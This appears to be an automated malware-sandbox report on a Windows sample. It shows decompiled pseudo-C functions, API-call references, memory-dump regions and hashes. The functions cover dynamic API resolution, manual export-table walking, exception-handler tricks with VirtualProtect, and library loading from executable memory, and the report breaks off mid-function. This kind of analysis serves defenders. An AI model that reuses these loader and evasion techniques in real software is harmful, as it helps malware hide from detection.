                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$ChangeCloseCreateFindModuleNameNotificationPointerRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3318007303-0
                                                                                                                                                                        • Opcode ID: 5bbbbd3aa86afcc0e4386a98720179ec2a7d3627c1b65dc99dcffb977315ad08
                                                                                                                                                                        • Instruction ID: ec45637102d6b2b0564e1f50d756395bedd24ba2b91383356c2343a33bb4597d
                                                                                                                                                                        • Opcode Fuzzy Hash: 5bbbbd3aa86afcc0e4386a98720179ec2a7d3627c1b65dc99dcffb977315ad08
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D117CB0A00118BBDB21ABA5DC85EAF7E6DEF41754F104026F605F61A0D7748E40DAA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E004012E6(void* __ecx) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				_Unknown_base(*)()* _t7;
                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                        				struct HINSTANCE__* _t10;
                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                        
                                                                                                                                                                        				_t7 =  *0x4054b8;
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t14 =  *0x40546c; // 0x1a0
                                                                                                                                                                        				if(_t7 != 0) {
                                                                                                                                                                        					L2:
                                                                                                                                                                        					if(_t14 != 0) {
                                                                                                                                                                        						_t9 =  *_t7(_t14,  &_v8);
                                                                                                                                                                        						if(_t9 == 0) {
                                                                                                                                                                        							_v8 = _v8 & _t9;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					L5:
                                                                                                                                                                        					return _v8;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t10 = GetModuleHandleA(0x406016); // executed
                                                                                                                                                                        				 *0x4054c0 = _t10; // executed
                                                                                                                                                                        				_t7 = GetProcAddress(_t10, 0x406209); // executed
                                                                                                                                                                        				 *0x4054b8 = _t7;
                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                        					goto L5;
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L2;
                                                                                                                                                                        			}









                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNELBASE(00406016,00000000,?,?,004019B1,?,00000000), ref: 00401303
                                                                                                                                                                        • GetProcAddress.KERNELBASE(00000000,00406209), ref: 00401314
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                        • String ID: PWxt
                                                                                                                                                                        • API String ID: 1646373207-859090512
                                                                                                                                                                        • Opcode ID: b82fadf3abe6b121a3a9ccd6f8c7011957f696d7cd16a9b3f66cbe52e98997a9
                                                                                                                                                                        • Instruction ID: 42ee00f1bbdf4bd94032134305a6aa24ddba553fb98742428e3d6aee6d82d457
                                                                                                                                                                        • Opcode Fuzzy Hash: b82fadf3abe6b121a3a9ccd6f8c7011957f696d7cd16a9b3f66cbe52e98997a9
                                                                                                                                                                        • Instruction Fuzzy Hash: 0FF0FE71911614EBFB40DBA9EE05BEB77ACEB48715B11007AE905F3290E778DE408A6C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 24%
                                                                                                                                                                        			E004017F0(void* __eax, void* __ebx, void* __eflags) {
                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                        				void* _t32;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        
                                                                                                                                                                        				if(__eflags == 0) {
                                                                                                                                                                        					_t33 = _t32 + 1;
                                                                                                                                                                        					asm("cld");
                                                                                                                                                                        					_push(__eax);
                                                                                                                                                                        					_t9 = E00402BE5(__ebx);
                                                                                                                                                                        					__eflags = _t9;
                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                        						_t9 = E00402F32(__ebx, __ebx, __eflags);
                                                                                                                                                                        						__eflags = _t9;
                                                                                                                                                                        						if(_t9 == 0) {
                                                                                                                                                                        							_t10 =  *((intOrPtr*)(_t33 - 4));
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							_t7 = _t10 + 0xe; // 0xc70a74c0
                                                                                                                                                                        							_t9 = E00401B2B( *((intOrPtr*)(_t33 - 4)) + __ebx, ( *(_t33 - 0x14) ^  *(_t33 - 0x10)) + _t7,  *((intOrPtr*)(_t33 - 8)), ( *(_t33 - 0x14) ^  *(_t33 - 0x10)) + _t7); // executed
                                                                                                                                                                        							__eflags = _t9;
                                                                                                                                                                        							if(_t9 == 0) {
                                                                                                                                                                        								_t23 =  *0x4061c0 -  *0x4061cc +  *0x4061c4;
                                                                                                                                                                        								__eflags = _t23;
                                                                                                                                                                        								 *0x405490 = _t23;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					return _t9;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					return HeapAlloc();
                                                                                                                                                                        				}
                                                                                                                                                                        			}








                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00402F3B,00000028,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004017FB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                        • String ID: Nov 27 2018$pnls
                                                                                                                                                                        • API String ID: 4292702814-2641940728
                                                                                                                                                                        • Opcode ID: e6be84c049acb4b28d986b7440ac85b8ddb97ee12877b7dc0ff88ad08b654df5
                                                                                                                                                                        • Instruction ID: f44b72d3b629fb0394685678fed7df3424babebbe0900936eee55aa67ab105e5
                                                                                                                                                                        • Opcode Fuzzy Hash: e6be84c049acb4b28d986b7440ac85b8ddb97ee12877b7dc0ff88ad08b654df5
                                                                                                                                                                        • Instruction Fuzzy Hash: 3BF0A473A000018BC704EF69DE95AEF73B5EE95358711803AE806B72A1E779ED06C668
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00401E7C(intOrPtr* _a4) {
                                                                                                                                                                        				intOrPtr _t8;
                                                                                                                                                                        				void* _t11;
                                                                                                                                                                        				void* _t13;
                                                                                                                                                                        				intOrPtr _t16;
                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                        				intOrPtr _t18;
                                                                                                                                                                        				void* _t19;
                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                        				long* _t23;
                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                        
                                                                                                                                                                        				_t8 =  *0x4054c4; // 0x28885a8
                                                                                                                                                                        				_t24 = 0;
                                                                                                                                                                        				_t16 = _t8;
                                                                                                                                                                        				if(_t8 != 0) {
                                                                                                                                                                        					_t21 = _a4;
                                                                                                                                                                        					_t17 =  *_t21;
                                                                                                                                                                        					_t18 =  *_t17;
                                                                                                                                                                        					if(_t18 != 0xc0000005) {
                                                                                                                                                                        						if(_t18 == 0x80000004) {
                                                                                                                                                                        							_t7 = _t8 + 0x24; // 0x28885cc
                                                                                                                                                                        							_t23 = _t7;
                                                                                                                                                                        							if(TlsGetValue( *_t23) != 0) {
                                                                                                                                                                        								_t11 = E00401DA3(_t17, _t16, _t10, 0); // executed
                                                                                                                                                                        								if(_t11 == 0) {
                                                                                                                                                                        									TlsSetValue( *_t23, 0);
                                                                                                                                                                        									goto L8;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t19 =  *(_t17 + 0x18);
                                                                                                                                                                        						_t13 = E00401DA3(_t17, _t8, _t19, 1); // executed
                                                                                                                                                                        						if(_t13 == 0) {
                                                                                                                                                                        							TlsSetValue( *(_t16 + 0x24), _t19);
                                                                                                                                                                        							 *( *((intOrPtr*)(_t21 + 4)) + 0xc0) =  *( *((intOrPtr*)(_t21 + 4)) + 0xc0) | 0x00000100;
                                                                                                                                                                        							L8:
                                                                                                                                                                        							_t24 = _t24 | 0xffffffff;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t24;
                                                                                                                                                                        			}














                                                                                                                                                                        APIs
                                                                                                                                                                        • TlsSetValue.KERNEL32(?,?,028885A8,?,00000001), ref: 00401EB1
                                                                                                                                                                        • TlsGetValue.KERNEL32(028885CC), ref: 00401ED3
                                                                                                                                                                        • TlsSetValue.KERNEL32(028885CC,00000000,028885A8,00000000,00000000), ref: 00401EEC
                                                                                                                                                                          • Part of subcall function 00401DA3: EnterCriticalSection.KERNEL32(?,?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401DBC
                                                                                                                                                                          • Part of subcall function 00401DA3: VirtualProtect.KERNELBASE(?,00000001,0000000C,0000000C,?,?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401E07
                                                                                                                                                                          • Part of subcall function 00401DA3: GetLastError.KERNEL32(?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401E11
                                                                                                                                                                          • Part of subcall function 00401DA3: LeaveCriticalSection.KERNEL32(?,?,?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401E6C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Value$CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3047629960-0
                                                                                                                                                                        • Opcode ID: f0bb79ce37d910672525577a142f4f4a2664175f463c63f617a46cd5490a18dc
                                                                                                                                                                        • Instruction ID: f892b702af702f492ff1e24afad92ac387df28dcef502a2ce2009bcd421de9d0
                                                                                                                                                                        • Opcode Fuzzy Hash: f0bb79ce37d910672525577a142f4f4a2664175f463c63f617a46cd5490a18dc
                                                                                                                                                                        • Instruction Fuzzy Hash: 5601B171200105ABDB209F55DE48E2B77ADEF95355F21057EFE41B32B0DB3AEC409AA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E004027D6(intOrPtr __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, signed char _a16) {
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                        				void* _t14;
                                                                                                                                                                        				void* _t21;
                                                                                                                                                                        				void* _t23;
                                                                                                                                                                        				void* _t24;
                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                        				void* _t27;
                                                                                                                                                                        
                                                                                                                                                                        				_t25 = __edx;
                                                                                                                                                                        				_t23 = 8;
                                                                                                                                                                        				_push(0x318);
                                                                                                                                                                        				_t27 = E004017EF(_t14, _t23, __eflags);
                                                                                                                                                                        				if(_t27 != 0) {
                                                                                                                                                                        					memset(_t27, 0, 0x318);
                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                        					 *((intOrPtr*)(_t27 + 8)) = _a8;
                                                                                                                                                                        					 *((intOrPtr*)(_t27 + 0xc)) = _t25;
                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                        					 *((intOrPtr*)(_t27 + 0x10)) = _a12;
                                                                                                                                                                        					 *((intOrPtr*)(_t27 + 0x14)) = _t25;
                                                                                                                                                                        					if((_a16 & 0x00000010) != 0) {
                                                                                                                                                                        						L4:
                                                                                                                                                                        						_t21 = E00402F98(_a4, _t24, _t25, _t27); // executed
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t33 =  *0x405478 & 0x00000001;
                                                                                                                                                                        						if(( *0x405478 & 0x00000001) == 0) {
                                                                                                                                                                        							goto L4;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t21 = E00401152(_t24, _t25, _t27, _t33, _a4);
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_t23 = _t21;
                                                                                                                                                                        					E00401759(_t27);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t23;
                                                                                                                                                                        			}














                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004017EF: HeapAlloc.KERNEL32(00000000,?,00402F3B,00000028,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004017FB
                                                                                                                                                                        • memset.NTDLL ref: 004027F5
                                                                                                                                                                          • Part of subcall function 00401152: memset.NTDLL ref: 00401178
                                                                                                                                                                          • Part of subcall function 00401152: memcpy.NTDLL ref: 004011A0
                                                                                                                                                                          • Part of subcall function 00401152: GetLastError.KERNEL32(00000010,00000218,004031BD,00000100,?,00000318,00000008), ref: 004011B7
                                                                                                                                                                          • Part of subcall function 00401152: GetLastError.KERNEL32(00000010,?,00000000,?,?,?,?,?,?,?,?,00000010,00000218,004031BD,00000100), ref: 00401295
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLastmemset$AllocHeapmemcpy
                                                                                                                                                                        • String ID: w)@
                                                                                                                                                                        • API String ID: 1944541758-2623895996
                                                                                                                                                                        • Opcode ID: 58b65bcc03392f07201bb3d8eef2a0bba0991503ac3b41638cd973c80079b080
                                                                                                                                                                        • Instruction ID: a231346dc3ff00611907bf072bf1c0deacee3ba72b6151c5b3ababc7b41969a1
                                                                                                                                                                        • Opcode Fuzzy Hash: 58b65bcc03392f07201bb3d8eef2a0bba0991503ac3b41638cd973c80079b080
                                                                                                                                                                        • Instruction Fuzzy Hash: 480126325013086BD321AF29DC45B873BE8EF44318F10813FF845A72D1D3B8D90487A8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E00401C6C(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                        				intOrPtr _t8;
                                                                                                                                                                        				void* _t10;
                                                                                                                                                                        				signed int _t12;
                                                                                                                                                                        				void* _t15;
                                                                                                                                                                        				signed int _t17;
                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_push(_t15);
                                                                                                                                                                        				_t8 = E00401BDE(_t15, __ecx, __edx, __eflags,  *0x40547c,  &_v8, 1);
                                                                                                                                                                        				_v12 = _t8;
                                                                                                                                                                        				if(_t8 != 0) {
                                                                                                                                                                        					 *0x405484 =  *0x405484 & 0x00000000;
                                                                                                                                                                        					__eflags =  *0x405484;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t17 = _v8;
                                                                                                                                                                        					_t22 = __imp__GetLongPathNameW;
                                                                                                                                                                        					_t10 =  *_t22(_t17, _t8, _t8); // executed
                                                                                                                                                                        					_t25 = _t10;
                                                                                                                                                                        					_t28 = _t25;
                                                                                                                                                                        					if(_t25 == 0) {
                                                                                                                                                                        						L4:
                                                                                                                                                                        						 *0x405484 = _t17;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t5 = _t25 + 2; // 0x2
                                                                                                                                                                        						_push(_t25 + _t5);
                                                                                                                                                                        						_t12 = E004017EF(_t25 + _t5, _t17, _t28);
                                                                                                                                                                        						 *0x405484 = _t12;
                                                                                                                                                                        						if(_t12 == 0) {
                                                                                                                                                                        							goto L4;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							 *_t22(_t17, _t12, _t25); // executed
                                                                                                                                                                        							E00401759(_t17);
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _v12;
                                                                                                                                                                        			}


                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00401BDE: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,?,00000000,?,?,00401C85,?,00000001,?,00000000), ref: 00401C04
                                                                                                                                                                        • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401C98
                                                                                                                                                                          • Part of subcall function 004017EF: HeapAlloc.KERNEL32(00000000,?,00402F3B,00000028,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004017FB
                                                                                                                                                                        • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401CB6
                                                                                                                                                                          • Part of subcall function 00401759: HeapFree.KERNEL32(00000000,?,00401640,?,00000000,?,00400000,00402F8E,00000000,?,00000000,00401829,?,00000000), ref: 00401765
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Name$HeapLongPath$AllocFileFreeModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3274793655-0
                                                                                                                                                                        • Opcode ID: d7036732f33cbc1196bba7b4d50375836e1a20677f6377a72e691aadefeb9ae2
                                                                                                                                                                        • Instruction ID: a4f025c43ab50e7ead91649edf19bbaa3c6ffac15d549e7b47d7d775a37e5c38
                                                                                                                                                                        • Opcode Fuzzy Hash: d7036732f33cbc1196bba7b4d50375836e1a20677f6377a72e691aadefeb9ae2
                                                                                                                                                                        • Instruction Fuzzy Hash: F5F06DB1514204BEE710AB669E85EAB7BECDB44359B00003AF901F7261E278ED009B78
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                        			E00401000(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				intOrPtr* _t57;
                                                                                                                                                                        				intOrPtr _t60;
                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                        				CHAR* _t80;
                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                        				signed short* _t90;
                                                                                                                                                                        				void* _t94;
                                                                                                                                                                        				void* _t95;
                                                                                                                                                                        				void* _t108;
                                                                                                                                                                        
                                                                                                                                                                        				_push(0x2c);
                                                                                                                                                                        				_push(0x404148); // executed
                                                                                                                                                                        				E004031F0(__ebx, __edi, __esi); // executed
                                                                                                                                                                        				 *((intOrPtr*)(_t95 - 0x24)) = 0;
                                                                                                                                                                        				 *(_t95 - 4) = 0;
                                                                                                                                                                        				_t85 =  *((intOrPtr*)(_t95 + 8));
                                                                                                                                                                        				_t56 =  *((intOrPtr*)(_t85 + 0x3c)) + _t85;
                                                                                                                                                                        				if( *((short*)(_t56 + 4)) != 0x14c) {
                                                                                                                                                                        					_t57 = _t56 + 0x88;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t57 = _t56 + 0x78;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t94 =  *_t57 + _t85;
                                                                                                                                                                        				if( *_t57 == 0 ||  *((intOrPtr*)(_t57 + 4)) == 0 ||  *((intOrPtr*)(_t94 + 0x1c)) == 0) {
                                                                                                                                                                        					L27:
                                                                                                                                                                        					 *(_t95 - 4) =  *(_t95 - 4) | 0xffffffff;
                                                                                                                                                                        					return E0040322B( *((intOrPtr*)(_t95 - 0x24)));
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t60 =  *((intOrPtr*)(_t94 + 0x14));
                                                                                                                                                                        					if(_t60 != 0) {
                                                                                                                                                                        						_t79 =  *((intOrPtr*)(_t94 + 0x1c)) + _t85;
                                                                                                                                                                        						 *((intOrPtr*)(_t95 - 0x34)) = _t79;
                                                                                                                                                                        						_t88 =  *(_t95 + 0xc);
                                                                                                                                                                        						 *(_t95 - 0x20) = _t88;
                                                                                                                                                                        						if(_t88 == 0 || _t88 > 0xffff) {
                                                                                                                                                                        							 *(_t95 - 0x20) = 0;
                                                                                                                                                                        							_t60 =  *((intOrPtr*)(_t94 + 0x18));
                                                                                                                                                                        						}
                                                                                                                                                                        						 *((intOrPtr*)(_t95 - 0x2c)) = _t60;
                                                                                                                                                                        						if( *((intOrPtr*)(_t94 + 0x24)) == 0) {
                                                                                                                                                                        							_t61 =  *(_t95 - 0x20);
                                                                                                                                                                        							if(_t61 != 0) {
                                                                                                                                                                        								 *((intOrPtr*)(_t95 - 0x24)) = _t79 + _t61 * 4 - 4;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L27;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t90 =  *((intOrPtr*)(_t94 + 0x24)) + _t85;
                                                                                                                                                                        						 *(_t95 - 0x3c) = _t90;
                                                                                                                                                                        						_t77 =  *((intOrPtr*)(_t94 + 0x20)) + _t85;
                                                                                                                                                                        						 *((intOrPtr*)(_t95 - 0x38)) = _t77;
                                                                                                                                                                        						 *(_t95 - 0x28) =  *(_t95 - 0x28) & 0x00000000;
                                                                                                                                                                        						while( *(_t95 - 0x28) <  *((intOrPtr*)(_t95 - 0x2c))) {
                                                                                                                                                                        							 *(_t95 - 0x1c) =  *(_t95 - 0x1c) & 0x00000000;
                                                                                                                                                                        							if( *(_t95 - 0x20) == 0) {
                                                                                                                                                                        								_t65 =  *_t77 + _t85;
                                                                                                                                                                        								 *(_t95 - 0x30) = _t65;
                                                                                                                                                                        								_t80 =  *(_t95 + 0xc);
                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                        									E00401935(lstrlenA(_t65),  *(_t95 - 0x30));
                                                                                                                                                                        									L19:
                                                                                                                                                                        									if(_t108 == 0) {
                                                                                                                                                                        										 *(_t95 - 0x1c) = 1;
                                                                                                                                                                        									}
                                                                                                                                                                        									L21:
                                                                                                                                                                        									if( *(_t95 - 0x1c) == 0) {
                                                                                                                                                                        										_t77 = _t77 + 4;
                                                                                                                                                                        										 *((intOrPtr*)(_t95 - 0x38)) = _t77;
                                                                                                                                                                        										_t90 =  &(_t90[1]);
                                                                                                                                                                        										 *(_t95 - 0x3c) = _t90;
                                                                                                                                                                        										 *(_t95 - 0x28) =  *(_t95 - 0x28) + 1;
                                                                                                                                                                        										_t85 =  *((intOrPtr*)(_t95 + 8));
                                                                                                                                                                        										continue;
                                                                                                                                                                        									}
                                                                                                                                                                        									 *((intOrPtr*)(_t95 - 0x24)) =  *((intOrPtr*)(_t95 - 0x34)) + ( *_t90 & 0x0000ffff) * 4;
                                                                                                                                                                        									if(0 != 0) {
                                                                                                                                                                        										 *((intOrPtr*)(0)) =  *_t77 +  *((intOrPtr*)(_t95 + 8));
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L27;
                                                                                                                                                                        								}
                                                                                                                                                                        								if( *_t65 !=  *_t80) {
                                                                                                                                                                        									goto L21;
                                                                                                                                                                        								}
                                                                                                                                                                        								lstrcmpA(_t65, _t80); // executed
                                                                                                                                                                        								goto L19;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t108 =  *(_t95 - 0x20) - ( *_t90 & 0x0000ffff) +  *((intOrPtr*)(_t94 + 0x10));
                                                                                                                                                                        							goto L19;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L27;
                                                                                                                                                                        				}
                                                                                                                                                                        			}


















                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcmpA.KERNEL32(?,?,00404148,0000002C,004018BB,77DF0000,00000000,77E5A3B0,?,00000000,?,?,004019C4,?,00000000), ref: 004010CE
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00404148,0000002C,004018BB,77DF0000,00000000,77E5A3B0,?,00000000,?,?,004019C4,?,00000000), ref: 004010D9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcmplstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 898299967-0
                                                                                                                                                                        • Opcode ID: 7f11c4fab90abfa01e722fe00cac28f3f29e75b4c9a19731dcfea94b6951f67a
                                                                                                                                                                        • Instruction ID: ecc7765303b5585171c7bc493ad3cc43017e59271b9510c50ee32afaf6519d2a
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f11c4fab90abfa01e722fe00cac28f3f29e75b4c9a19731dcfea94b6951f67a
                                                                                                                                                                        • Instruction Fuzzy Hash: EB412571900259DFCB24CF99C8806AEB7F1BF49315F14853EE156BB7A0C338A981CB18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 008003DA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.429106240.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                        • Opcode ID: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
                                                                                                                                                                        • Instruction ID: 5d631cf80fa6411d929cc2185aced16cc883c55bd1215ff6a89e1f5af6d183e4
                                                                                                                                                                        • Opcode Fuzzy Hash: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
                                                                                                                                                                        • Instruction Fuzzy Hash: E801D873A00508ABE7618A19DC40F7B7359FFC5724F2AC525F906E73C1C575DC014AA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E004012A3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                        				intOrPtr* _t5;
                                                                                                                                                                        				long _t6;
                                                                                                                                                                        				void* _t9;
                                                                                                                                                                        
                                                                                                                                                                        				_t5 =  *0x405020;
                                                                                                                                                                        				_t9 = 0;
                                                                                                                                                                        				if(_t5 == 0) {
                                                                                                                                                                        					_t6 = 0xc0000002;
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				} else {
